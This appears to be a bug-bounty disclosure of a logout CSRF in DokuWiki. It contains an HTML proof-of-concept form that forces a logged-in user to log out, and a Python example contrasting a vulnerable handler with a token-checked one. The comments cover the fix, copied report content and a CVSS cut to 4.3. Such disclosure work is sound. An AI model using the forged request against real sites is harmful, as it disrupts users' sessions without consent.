Cross-Site Request Forgery (CSRF) in splitbrain/dokuwiki

Valid

Reported on

Dec 12th 2021


Description

An attacker is able to log out a user if a logged-in user visits the attacker's website.

Proof of Concept

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:8800/doku.php">
      <input type="hidden" name="id" value="wiki&#58;welcome" />
      <input type="hidden" name="do" value="logout" />
      <input type="hidden" name="sectok" value="e4e1654b3649a6ba8e7daef724bd54a0" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Impact

This vulnerability allows an attacker to force a logged-in user to log out unintentionally.

More Detail

One way a GET-based logout could be abused is that someone (a competitor, perhaps) places an image tag with src="<your logout link>" anywhere on the internet; if a user of your site stumbles upon that page, they will be logged out without knowing it. This is why logout should be a POST request protected by a CSRF token.
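To make the distinction concrete, here is an added example (not DokuWiki's code) contrasting a logout handler that fires on any request carrying do=logout with one that requires POST and a matching per-session token; the parameter names do and sectok are taken from the PoC above, the session layout and handler signatures are assumptions.

```python
import hmac
import secrets


def new_session() -> dict:
    """Constructed session state for the example: a logged-in user
    plus a random CSRF token bound to that session."""
    return {"user": "alice", "csrf_token": secrets.token_hex(16)}


def logout_vulnerable(session: dict, method: str, params: dict) -> bool:
    """Logs out on any request with do=logout, regardless of HTTP method
    or token. An <img src=".../doku.php?do=logout"> on a third-party page
    is enough, because the browser attaches the victim's session cookie."""
    if params.get("do") == "logout":
        session.pop("user", None)
        return True
    return False


def logout_hardened(session: dict, method: str, params: dict) -> bool:
    """Logs out only on a POST whose sectok equals the token stored in the
    victim's own session. A cross-site page cannot read that token, so a
    forged form (like the PoC, with a token from the attacker's session)
    is rejected; requiring POST additionally keeps the action out of
    <img>/<a> GET fetches."""
    if method != "POST" or params.get("do") != "logout":
        return False
    expected = session.get("csrf_token")
    supplied = params.get("sectok", "")
    if not expected or not isinstance(supplied, str):
        return False
    # Constant-time comparison on bytes (compare_digest on str requires ASCII).
    if not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False  # missing or wrong token: ignore, user stays logged in
    session.pop("user", None)
    session["csrf_token"] = secrets.token_hex(16)  # rotate after use
    return True
```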

Note

While this cannot harm a user's account, it can be a great annoyance and is a valid CSRF.

We are processing your report and will contact the splitbrain/dokuwiki team within 24 hours. a year ago
We have contacted a member of the splitbrain/dokuwiki team and are waiting to hear back a year ago
Andreas Gohr validated this vulnerability a year ago
Devendra Bhatla has been awarded the disclosure bounty
The fix bounty is now up for grabs
Andreas Gohr marked this as fixed with commit 6a2553 a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
Andreas Gohr
a year ago

Maintainer


@admin is there a way to adjust the severity? It's not really high.

KhanhCM
a year ago

Hey @dev696,

A real researcher will not just copy all the content from other reports. You should try to write your reports by yourself. What have you learned after reporting this vulnerability? Just earn the bounty or improve your skills in cybersecurity?

Furthermore, the severity for this vulnerability is not High, it's Medium (CVSS from 4.3 to 6.5, maybe). You can check it on some reports or CVEs. DokuWiki's users will be shocked if they learn that their app has a High vulnerability when the impact is just logging out a user, with no effect on the account, just an annoyance!

Jamie Slome
a year ago

Admin


@splitbrain - absolutely, we can arrange that for you!

Can you advise on a severity score that would be more fitting for the report?

Please can you also create a CVSS vector string using the calculator here:

https://www.first.org/cvss/calculator/3.1

HDVinnie
a year ago

@admin @dev696 has def copy pasted my content from my reports. This should only be a 4.3

Devendra Bhatla
a year ago

Researcher


Hi @admin Please set CVSS to 4.3

Jamie Slome
a year ago

Admin


Can you please provide the CVSS vector string to use for the new CVSS score?

Devendra Bhatla
a year ago

Researcher


@admin Please find the below CVSS Vector string.

CVSS Score = 4.3 CVSS Vector string = CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Jamie Slome
a year ago

Admin


CVSS adjusted from 7.3 to 4.3 - thanks! 🙏

Devendra Bhatla
a year ago

Researcher


Thanks for all your help Jamie, as always!
